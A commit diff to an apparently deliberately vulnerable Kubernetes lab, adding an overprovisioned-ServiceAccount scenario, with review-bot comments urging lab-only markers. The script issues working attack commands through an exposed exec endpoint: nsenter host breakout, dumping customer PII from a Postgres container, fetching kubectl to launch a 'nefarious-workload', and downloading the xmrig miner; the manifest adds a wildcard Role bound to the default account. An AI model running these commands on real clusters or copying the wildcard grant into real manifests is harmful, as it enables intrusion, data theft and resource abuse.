
Commit 55a402c

Added overprovisioned service-account scenario
1 parent 4e9ba8b commit 55a402c


2 files changed

+32
-2
lines changed


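--- a/example-curls.sh
+++ b/example-curls.sh
@@ -28,7 +28,13 @@ echo "6. Exfil some data from another container running on the same Node"
 POSTGRES_ID=$(curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=nsenter --all --target=1 crictl ps --name postgres-sakila -q')
 curl -X POST $NODE_IP:$NODE_PORT/exec -d "command=nsenter --all --target=1 crictl exec $POSTGRES_ID psql -U postgres -c 'SELECT c.first_name, c.last_name, c.email, a.address, a.postal_code FROM customer c JOIN address a ON (c.address_id = a.address_id)'"
 
-echo "7. Exploit running a script to run a crypto miner"
+echo "7. Call the Kubernetes API via security-playground's K8s ServiceAccount"
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=curl -O https://s3.us-west-2.amazonaws.com/amazon-eks/1.26.4/2023-05-11/bin/linux/amd64/kubectl'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=chmod 0755 ./kubectl'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl create deployment nefarious-workload --image=public.ecr.aws/m9h2b5e7/security-playground:110623'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=./kubectl get pods'
+
+echo "8. Exploit running a script to run a crypto miner"
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=wget https://github.com/xmrig/xmrig/releases/download/v6.18.1/xmrig-6.18.1-linux-static-x64.tar.gz -O xmrig.tar.gz'
 curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=tar -xzvf xmrig.tar.gz'
-curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'
+curl -X POST $NODE_IP:$NODE_PORT/exec -d 'command=/app/xmrig-6.18.1/xmrig --dry-run'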
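Review bot: Step 7 creates the `nefarious-workload` deployment and nothing in the visible hunk removes it, so a second run of the script will presumably fail at `kubectl create deployment` with an already-exists error, and the lab leaves the workload running. A comment above the step would help, for example `# Lab only: leaves deployment nefarious-workload behind; delete it before re-running`. The same comment should note that the step succeeds only because security-playground.yaml binds a wildcard Role to the default ServiceAccount. The `$NODE_IP:$NODE_PORT` expansions on the added lines are unquoted, which matches the rest of the script but misbehaves if either value contains whitespace or glob characters; `"$NODE_IP:$NODE_PORT/exec"` is the safer form.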

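--- a/security-playground.yaml
+++ b/security-playground.yaml
@@ -3,6 +3,30 @@ kind: Namespace
 metadata:
 name: security-playground
 ---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+name: default
+namespace: security-playground
+rules:
+- apiGroups: ["*"]
+resources: ["*"]
+verbs: ["*"]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+name: default
+namespace: security-playground
+subjects:
+- kind: ServiceAccount
+name: default
+namespace: security-playground
+roleRef:
+kind: Role
+name: default
+apiGroup: rbac.authorization.k8s.io
+---
 apiVersion: apps/v1
 kind: Deployment
 metadata: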
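Review bot: The Role added at new lines 6–14 grants every verb on every resource in every API group, and the RoleBinding gives it to the namespace's `default` ServiceAccount, so any pod in `security-playground` that does not set its own service account inherits it, presumably including the deployment the script creates in step 7. That is the point of the scenario, but the manifest carries no marker saying so; I would add `# INTENTIONALLY OVERPROVISIONED: lab-only, do not reuse outside the playground` above the Role. Because this is a Role rather than a ClusterRole, the grant is confined to the `security-playground` namespace, which is worth stating in the same comment. Binding the Role to a dedicated ServiceAccount named in the Deployment, rather than to `default`, would keep the scenario working while limiting which pods receive the permissions; the Deployment spec lies outside this hunk, so confirm it does not already set one.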
